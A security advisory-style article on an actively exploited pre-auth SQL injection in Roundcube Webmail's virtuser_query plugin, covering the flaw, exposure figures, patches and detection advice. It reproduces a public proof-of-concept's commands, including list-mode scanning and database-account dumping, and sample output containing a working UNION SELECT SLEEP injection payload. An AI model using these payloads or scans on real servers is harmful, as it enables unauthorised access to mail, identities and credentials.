Unauthenticated SQL injection tracked as CVE-2026-48842, CVSS score of 8.1, in the optional virtuser_query plugin of Roundcube Webmail is undergoing active exploitation according to the Canadian Centre for Cyber Security. The flaw defeats preg_replace() backslash escaping and was addressed in versions 1.6.16 and 1.7.1 released in late May. A public proof-of-concept validates the issue with a true/false timing differential and database-account readout, a concern with over 500,000 Roundcube servers accessible from the internet.

How the flaw works

Roundcube is the popular open source webmail client at issue. Its optional virtuser_query component maps mail addresses to mailbox usernames before a database lookup.

That component attempted to block injection by applying a preg_replace() filter that adds backslash escaping. According to analysis attributed to SentinelOne, specially formed input containing backslash sequences passes through that expression filter in a way that leaves quote marks able to join the SQL text forwarded to the database.

No login is required to reach the vulnerable path. Paymob information security lead Omar Ahmed notes that successful use permits altering database operations, reading protected data, reaching user identities, messages and address books, and charting login workflows and administrative functions.

The NVD entry for CVE-2026-48842 was listed May 25, 2026, with a note that the record is not being prioritized for NVD enrichment efforts. The CVE JSON record carries the canonical identifier data.

Exploitation warning and exposure

The Canadian Centre for Cyber Security advised this week that threat actors have been exploiting the bug in attacks, citing open-source reporting of in-the-wild use, but it did not publish details of the activity it observed.

The Shadowserver Foundation, described as a non-profit organization, reports over 500,000 Roundcube servers accessible from the internet. It remains unclear how many remain vulnerable.

Roundcube installations have drawn repeated attention from attackers, with prior examples listed as CVE-2025-68461, CVE-2025-49113 and CVE-2024-37383.

Proof of concept

A public tester for CVE-2026-48842, described as a pre-auth SQL injection in the optional virtuser_query plugin of Roundcube Webmail, is available in the PoC repository.

The tool is described as doing two things without guessing:

  • Confirms the injection with a true/false differential, not a single sleep.
  • Proves impact by reading the database account out of the target with --dumpdbuser.

It prints the exact SQL each probe produces, so a failed or inconclusive result is never presented as a finding.

Install dependency:


pip install requests

Basic check against a single target:


python cve_2026_48842_poc.py https://mail.example.tld

Single target, prove impact by reading the DB account:


python cve_2026_48842_poc.py https://mail.example.tld --dumpdbuser

Faster oracle, with tuning for busy hosts:


python cve_2026_48842_poc.py https://mail.example.tld -d 3 --dumpdbuser

List mode:


python cve_2026_48842_poc.py --list hosts.txt
python cve_2026_48842_poc.py --list hosts.txt -d 3

Real run against a local Roundcube 1.6.15 as supplied by the PoC author:


[*] http://127.0.0.1/roundcube
    version=1.6.15  noise_floor=0.071s  _token=yes

[1] detection  injected=True  delta(true-false)=6.026s  delta(true-baseline)=6.015s  threshold=1.8s
    baseline                0.083s  http=401  sql_error=None
        _user=poc_baseline_user_9f2a
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='poc_baseline_user_9f2a'
    artifact_unterminated    0.09s  http=401  sql_error=None
        _user=a%5C
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='a\'
    injected_true           6.098s  http=401  sql_error=None
        _user=%5C%27+UNION+SELECT+IF%281%3D1%2CSLEEP%283%29%2C0%29--+-
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='\\' UNION SELECT IF(1=1,SLEEP(3),0)-- -'
    injected_false          0.072s  http=401  sql_error=None
        _user=%5C%27+UNION+SELECT+IF%281%3D

The output shows a baseline request with _user=poc_baseline_user_9f2a, an unterminated probe with _user=a%5C, and paired UNION SELECT IF(1=1,SLEEP(3),0) true/false probes delivered in _user with http=401 responses. The delta(true-false)=6.026s gap against a threshold=1.8s marks the instance as injected.

Detection and mitigation

Upgrade Roundcube to versions 1.6.16 and 1.7.1, which contain the fix. Operators should inventory internet-facing webmail hosts, confirm whether the virtuser_query plugin is enabled, prioritize externally reachable systems, and review database and web logs for anomalous unauthenticated requests to login-related endpoints carrying backslash and UNION SELECT patterns in the user field.

Given the documented ability to interfere with queries and view identities, correspondence, contact lists and authentication logic, exposed systems should be treated as potentially compromised until patched and examined.